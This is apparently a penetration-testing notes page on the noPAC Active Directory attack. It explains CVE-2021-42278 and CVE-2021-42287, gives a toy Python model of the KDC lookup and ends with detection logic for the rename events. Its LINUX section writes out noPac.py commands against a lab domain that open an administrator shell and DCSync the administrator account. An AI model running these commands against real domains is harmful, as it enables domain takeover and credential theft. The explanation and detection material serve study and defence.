noPAC
ABOUT
In November 2021 it was discovered that combining two vulnerabilities allows escalation from a standard domain user to Domain Admin privileges on a domain controller.
CVE-2021-42278
sAMAccountName spoofing (name impersonation). The DC did not enforce that a computer account's sAMAccountName ends with $, so a user who controls a machine account could rename it to a DC's name without the trailing $ (e.g. DC01 instead of DC01$).
CVE-2021-42287
To request a service ticket (ST) you present a TGT. If the KDC cannot find the account named in that TGT, it retries the lookup with a $ appended. So imagine we obtain a TGT for user bob and bob is then deleted: the KDC looks for bob$ and, if that account exists, issues the ST as bob$. Applied to a DC, a TGT issued to an account named DC01 is treated as the TGT of the DC's machine account DC01$.
Prerequisites
Authenticated low-privileged AD user
A DC without the November 2021 patches for both CVEs (KB5008102 for CVE-2021-42278, KB5008380 for CVE-2021-42287)
The attacker can create machine accounts (ms-DS-MachineAccountQuota, default 10 per user) or already controls one
FLOW
Create a machine account (or rename one you control) and set its sAMAccountName to the DC's name without the trailing $, e.g. DC01 instead of DC01$ (CVE-2021-42278)
Request a TGT for this account; the TGT now carries the name DC01
Rename the machine account back (or delete it), so that no account named DC01 exists anymore
Use that TGT to request a service ticket via S4U2self, impersonating a privileged user such as Administrator
The KDC looks up the account named in the TGT. DC01 is not found (we renamed/deleted it), so it retries with DC01$ and finds the real DC machine account (CVE-2021-42287)
Success: the KDC treats your TGT as the DC's TGT and issues a service ticket for the DC as the impersonated user, which can then be used for DCSync or a shell on the DC
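The two KDC behaviours described in ABOUT, played through the FLOW steps above, as an added toy model (this is example code written for this page, not the noPAC exploit or any Windows code). The in-memory directory, the account names DC01$, FAKE01$ and sreed, and the two fix switches are constructed here; a real KDC is not this simple, but the lookup logic is the point:

```python
"""Toy model of the two KDC behaviours behind noPAC.

Added example, not code from the original page or from any noPAC exploit.
The in-memory directory, the account names (DC01$, FAKE01$, sreed) and the
two boolean "fix" switches are constructed here to play the FLOW section
through a vulnerable and a patched lookup; a real KDC is not this simple.
"""
from typing import Dict, Optional


class Account:
    def __init__(self, sam: str, is_computer: bool) -> None:
        self.sam = sam
        self.is_computer = is_computer


class Directory:
    """Minimal sAMAccountName index, case-insensitive like AD."""

    def __init__(self) -> None:
        self._by_sam: Dict[str, Account] = {}

    def add(self, acct: Account) -> None:
        self._by_sam[acct.sam.lower()] = acct

    def find(self, sam: str) -> Optional[Account]:
        return self._by_sam.get(sam.lower())

    def rename(self, old: str, new: str, fix_42278: bool) -> None:
        """Rename an account. With fix_42278 the DC enforces the trailing '$'
        on computer accounts, which is the CVE-2021-42278 hardening."""
        acct = self._by_sam[old.lower()]
        if fix_42278 and acct.is_computer and not new.endswith("$"):
            raise PermissionError("computer sAMAccountName must end with $")
        if self.find(new) is not None:
            raise ValueError("sAMAccountName already in use")
        del self._by_sam[old.lower()]
        acct.sam = new
        self._by_sam[new.lower()] = acct


def kdc_resolve_tgt_owner(directory: Directory, cname: str, fix_42287: bool) -> Optional[Account]:
    """Resolve the client name carried in a TGT while processing a TGS-REQ.
    Without fix_42287 the KDC silently retries with '$' appended, which is
    the CVE-2021-42287 behaviour; with the fix an unknown cname simply fails."""
    acct = directory.find(cname)
    if acct is not None or fix_42287:
        return acct
    return directory.find(cname + "$")


def run_flow(fix_42278: bool = False, fix_42287: bool = False) -> str:
    """Play the FLOW section against a KDC with the given fixes applied and
    return whose account the final TGS-REQ is attributed to."""
    directory = Directory()
    directory.add(Account("DC01$", is_computer=True))      # the real DC
    directory.add(Account("sreed", is_computer=False))     # low-privileged user
    directory.add(Account("FAKE01$", is_computer=True))    # attacker-created machine account

    # Step 1: rename the attacker's machine account to the DC's name without '$'.
    try:
        directory.rename("FAKE01$", "DC01", fix_42278)
    except PermissionError:
        return "blocked: rename rejected by CVE-2021-42278 fix"

    # Step 2: a TGT is issued for the renamed account; only its cname matters here.
    tgt = {"cname": "DC01"}

    # Step 3: rename the account back so that no account named DC01 exists.
    directory.rename("DC01", "FAKE01$", fix_42278)

    # Step 4: the TGT is used in a TGS-REQ and the KDC resolves its owner.
    owner = kdc_resolve_tgt_owner(directory, tgt["cname"], fix_42287)
    if owner is None:
        return "blocked: TGT owner not found (CVE-2021-42287 fix)"
    return owner.sam


if __name__ == "__main__":
    for a, b in ((False, False), (True, False), (False, True)):
        print(f"fix_42278={a} fix_42287={b}: {run_flow(a, b)}")
```

Running it shows why either patch alone breaks the chain: with neither fix the TGS-REQ is attributed to DC01$, with the 42278 fix the rename never happens, and with the 42287 fix the KDC refuses to guess the $.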
LINUX
To run this from Linux we need this exploit: [LINK]
Scanning for noPAC
sudo python3 scanner.py militech.local/sreed:password123 -dc-ip 13.13.13.13 -use-ldap
Running noPAC & Shell
sudo python3 noPac.py MILITECH.LOCAL/sreed:password123 -dc-ip 13.13.13.13 -dc-host MILITECH-EA-DC01 -shell --impersonate administrator -use-ldap
The shell is opened with impacket's smbexec.
noPac also saves the obtained ticket as a .ccache file in the current directory, so it can be reused with other impacket tools via KRB5CCNAME. Check whether the machine account created for the attack is still present in the domain afterwards and remove it if so.
DCSync using noPAC
sudo python3 noPac.py MILITECH.LOCAL/sreed:password123 -dc-ip 13.13.13.13 -dc-host MILITECH-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user MILITECH/administrator
Basically we just swapped the -shell parameter for -dump, and limited the dump to one account with -just-dc-user.
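The rename sequence in FLOW is visible on the DC as account-management events: 4741 (computer account created) followed by 4781 (account name changed) to a name without $ and back. The following detection logic is an added example, not part of the original page or of any exploit; the event lines are constructed JSON in the shape of a forwarded Security log, not a real capture, DC_NAMES is assumed to come from inventory, and MILITECH-EA-DC01 is just the DC name used in the commands on this page:

```python
"""Detection of the noPAC rename sequence from DC Security-log events.

Added example, not code from the original page or any exploit. The event
lines below are constructed JSON in the shape of a forwarded Windows Security
log, not a real capture; DC_NAMES is assumed to come from inventory.
Event 4741 = computer account created, 4781 = account name changed.
"""
import json
from typing import Dict, List

# Hypothetical list of DC computer names (sAMAccountName without the '$').
DC_NAMES = {"MILITECH-EA-DC01"}

# Constructed sample: sreed creates a machine account, renames it to the DC's
# name without '$', then renames it back; itadmin performs legitimate changes.
SAMPLE_EVENTS = """\
{"EventID": 4741, "TimeCreated": "2021-12-13T10:00:01Z", "SubjectUserName": "sreed", "TargetUserName": "WKS-NEW01$"}
{"EventID": 4781, "TimeCreated": "2021-12-13T10:00:05Z", "SubjectUserName": "sreed", "OldTargetUserName": "WKS-NEW01$", "NewTargetUserName": "MILITECH-EA-DC01"}
{"EventID": 4781, "TimeCreated": "2021-12-13T10:00:09Z", "SubjectUserName": "sreed", "OldTargetUserName": "MILITECH-EA-DC01", "NewTargetUserName": "WKS-NEW01$"}
{"EventID": 4781, "TimeCreated": "2021-12-13T11:30:00Z", "SubjectUserName": "itadmin", "OldTargetUserName": "LAB-OLD07$", "NewTargetUserName": "LAB-NEW07$"}
{"EventID": 4741, "TimeCreated": "2021-12-13T12:00:00Z", "SubjectUserName": "itadmin", "TargetUserName": "LAB-NEW08$"}
"""


def parse_events(text: str) -> List[Dict]:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_nopac_renames(events: List[Dict]) -> List[Dict]:
    """Flag 4781 events where a computer account (old name ends in '$') is
    renamed to a name without '$'. Severity is high when the new name is a
    DC's name, and each alert records whether the renaming user also created
    the account (the machine-account-quota path from Prerequisites)."""
    dc_names = {name.upper() for name in DC_NAMES}
    creators: Dict[str, str] = {}  # lower-cased sAMAccountName -> creating user
    alerts: List[Dict] = []
    for ev in events:  # assumes chronological order, as in a log export
        if ev["EventID"] == 4741:
            creators[ev["TargetUserName"].lower()] = ev["SubjectUserName"]
            continue
        if ev["EventID"] != 4781:
            continue
        old, new = ev["OldTargetUserName"], ev["NewTargetUserName"]
        if not old.endswith("$") or new.endswith("$"):
            continue  # not a computer account losing its '$'
        alerts.append({
            "time": ev["TimeCreated"],
            "subject": ev["SubjectUserName"],
            "old_name": old,
            "new_name": new,
            "severity": "high" if new.upper() in dc_names else "medium",
            "renamed_by_creator": creators.get(old.lower()) == ev["SubjectUserName"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_nopac_renames(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

On the sample only sreed's rename to MILITECH-EA-DC01 is flagged (high, renamed by the account's own creator); itadmin's rename between two names that keep the $ is ignored. On DCs that have the November 2021 patches the rejection itself is logged (Directory-Services-SAM events 16990/16991 for the rename, KDC events from ID 35 upward for the $ fallback), which is the simpler signal where available; the rule above also works against unpatched DCs.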